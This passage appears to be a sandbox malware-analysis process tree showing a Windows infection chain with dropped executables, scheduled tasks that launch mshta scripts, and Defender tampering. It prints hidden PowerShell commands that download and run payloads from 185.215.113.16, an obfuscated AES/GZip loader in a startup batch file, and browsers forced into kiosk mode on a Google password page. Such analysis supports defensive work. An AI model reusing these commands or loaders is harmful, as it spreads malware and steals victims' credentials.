                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:3368
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:5740
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:5752
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\dtjmy" & exit
                                  5⤵
                                    PID:2400
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 10
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:5128
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 956
                                  4⤵
                                  • Program crash
                                  PID:1856
                              • C:\Users\Admin\AppData\Local\Temp\1085964001\Setup_2024.exe
                                "C:\Users\Admin\AppData\Local\Temp\1085964001\Setup_2024.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • System Location Discovery: System Language Discovery
                                PID:1288
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Office 2024 Installer\Click To Run.bat" "
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3660
                                  • C:\Program Files (x86)\Office 2024 Installer\setup.exe
                                    setup /configure configuration.xml
                                    5⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Checks system information in the registry
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3348
                              • C:\Users\Admin\AppData\Local\Temp\1085971101\97509cc0ad.exe
                                "C:\Users\Admin\AppData\Local\Temp\1085971101\97509cc0ad.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:4076
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn utVFjmaNpjP /tr "mshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta" /sc minute /mo 25 /ru "Admin" /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3160
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn utVFjmaNpjP /tr "mshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta" /sc minute /mo 25 /ru "Admin" /f
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2100
                                • C:\Windows\SysWOW64\mshta.exe
                                  mshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta
                                  4⤵
                                  • Checks computer location settings
                                  • System Location Discovery: System Language Discovery
                                  PID:3664
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:856
                                    • C:\Users\Admin\AppData\Local\Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE
                                      "C:\Users\Admin\AppData\Local\Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE"
                                      6⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5152
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" "
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3392
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" any_word
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4140
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 2
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Delays execution with timeout.exe
                                    PID:2524
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5384
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5400
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5624
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5640
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5876
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5888
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn "mgdn1madETo" /tr "mshta \"C:\Temp\Kzqb5sWMO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:5132
                                  • C:\Windows\SysWOW64\mshta.exe
                                    mshta "C:\Temp\Kzqb5sWMO.hta"
                                    5⤵
                                    • Checks computer location settings
                                    • System Location Discovery: System Language Discovery
                                    PID:4080
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Downloads MZ/PE file
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3948
                                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                        7⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        PID:2064
                              • C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:5596
                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5808
                                  • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                    5⤵
                                      PID:5776
                                      • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                        6⤵
                                          PID:4800
                                      • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                        5⤵
                                          PID:5344
                                          • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                            6⤵
                                              PID:5360
                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                              6⤵
                                                PID:3612
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 836
                                                6⤵
                                                • Program crash
                                                PID:6120
                                            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                              5⤵
                                                PID:548
                                                • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                  6⤵
                                                    PID:5668
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 968
                                                    6⤵
                                                    • Program crash
                                                    PID:5612
                                                • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                                                  5⤵
                                                    PID:6008
                                                  • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                    5⤵
                                                      PID:5204
                                                      • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                        6⤵
                                                          PID:5240
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 956
                                                          6⤵
                                                          • Program crash
                                                          PID:1928
                                                      • C:\Users\Admin\AppData\Local\Temp\10007520101\ad3f9fad25.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10007520101\ad3f9fad25.exe"
                                                        5⤵
                                                          PID:3636
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM firefox.exe /T
                                                            6⤵
                                                            • Kills process with taskkill
                                                            PID:476
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM chrome.exe /T
                                                            6⤵
                                                            • Kills process with taskkill
                                                            PID:5412
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM msedge.exe /T
                                                            6⤵
                                                            • Kills process with taskkill
                                                            PID:1584
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM opera.exe /T
                                                            6⤵
                                                            • Kills process with taskkill
                                                            PID:1640
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F /IM brave.exe /T
                                                            6⤵
                                                            • Kills process with taskkill
                                                            PID:4328
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                            6⤵
                                                              PID:4484
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                7⤵
                                                                  PID:4348
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97700662-57e9-4fd6-8069-f23f9c573fe6} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" gpu
                                                                    8⤵
                                                                      PID:484
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a4030d-7397-4309-a3b5-9a336600e135} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" socket
                                                                      8⤵
                                                                        PID:3780
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1380 -childID 1 -isForBrowser -prefsHandle 3116 -prefMapHandle 3200 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea2ae86c-1ff0-4e15-88a1-12cef2b4a80c} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab
                                                                        8⤵
                                                                          PID:5988
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3976 -prefMapHandle 3972 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4309bd88-da3d-4b8f-a9df-63cfb937f184} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab
                                                                          8⤵
                                                                            PID:5132
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4856 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4868 -prefMapHandle 4864 -prefsLen 32945 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ee2252a-2c0e-412c-8882-92ff345003e4} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" utility
                                                                            8⤵
                                                                              PID:5712
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5348 -prefMapHandle 5380 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb259c6e-bf31-40ad-903a-820f3a935d3d} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab
                                                                              8⤵
                                                                                PID:6024
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {04a11fb5-0b8f-4b7e-b7ab-4c5aea1d8366} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab
                                                                                8⤵
                                                                                  PID:2276
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5796 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5700 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7fe891d-f965-489c-b6c8-a8e20749bb15} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab
                                                                                  8⤵
                                                                                    PID:5152
                                                                        • C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:752
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4712
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4048
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:336
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 980
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4720
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086049041\tYliuwV.ps1"
                                                                          3⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Drops startup file
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5732
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5560
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5400
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5580
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                6⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5504
                                                                        • C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4080
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1288
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 968
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5564
                                                                        • C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4536
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1448
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 968
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1612
                                                                        • C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe"
                                                                          3⤵
                                                                            PID:952
                                                                          • C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe"
                                                                            3⤵
                                                                              PID:5452
                                                                            • C:\Users\Admin\AppData\Local\Temp\1086055001\dd037fabef.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\1086055001\dd037fabef.exe"
                                                                              3⤵
                                                                                PID:5944
                                                                              • C:\Users\Admin\AppData\Local\Temp\1086056001\b7425f83d4.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1086056001\b7425f83d4.exe"
                                                                                3⤵
                                                                                  PID:4368
                                                                                • C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe"
                                                                                  3⤵
                                                                                    PID:416
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"
                                                                                    3⤵
                                                                                      PID:3368
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"
                                                                                        4⤵
                                                                                          PID:5956
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"
                                                                                          4⤵
                                                                                            PID:5040
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 976
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:5760
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1086059001\Setup_2024.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1086059001\Setup_2024.exe"
                                                                                          3⤵
                                                                                            PID:5744
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Office 2024 Installer\Click To Run.bat" "
                                                                                              4⤵
                                                                                                PID:232
                                                                                                • C:\Program Files (x86)\Office 2024 Installer\setup.exe
                                                                                                  setup /configure configuration.xml
                                                                                                  5⤵
                                                                                                    PID:5448
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2260 -ip 2260
                                                                                            1⤵
                                                                                              PID:4132
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4772 -ip 4772
                                                                                              1⤵
                                                                                                PID:4868
                                                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                1⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:5064
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
